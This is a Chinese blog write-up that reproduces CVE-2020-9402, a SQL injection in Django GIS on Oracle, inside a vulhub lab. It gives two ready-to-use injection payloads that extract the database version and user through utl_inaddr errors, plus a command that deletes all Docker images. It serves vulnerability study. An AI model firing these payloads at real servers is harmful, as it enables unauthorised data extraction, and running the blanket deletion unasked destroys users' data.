CVE-2020-9402 Django GIS sql注入漏洞
0x01.环境搭建
利用vulhub搭建漏洞环境
service docker start
docker-compose up -d
查看监听端口
docker-compose ps
访问http://target_ip:8000
,成功看到页面
0x02.漏洞介绍
该漏洞需要开发者使用了GIS中聚合查询的功能,用户在oracle的数据库且可控tolerance查询时的键名,在其位置注入sql语句
0x03.漏洞复现
漏洞一
首先访问http://target_ip:8000/vuln/
在该网页中使用get
方法构造q
的参数,构造sql注入的字符串20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null OR (1+1
payload
http://target_ip:8000/vuln/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1
漏洞二
访问http://target_ip:8000/vuln2/
。 在该网页中使用get
方法构造q
的参数,构造出sql注入的字符串0.05))) FROM "VULN_COLLECTION2" where (select utl_inaddr.get_host_name((SELECT user FROM DUAL)) from dual) is not null --
payload
http://target_ip:8000/vuln2/?q=0.05)))%20FROM%20%22VULN_COLLECTION2%22%20%20where%20%20(select%20utl_inaddr.get_host_name((SELECT%20user%20FROM%20DUAL))%20from%20dual)%20is%20not%20null%20%20--
0x04.一点坑
这个环境要9个g,在装这个环境前我把之前装的镜像全删了
docker rmi $(docker images -q)
环境启动后会连不上去,此时很简单,睡个觉回来再看就行了
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。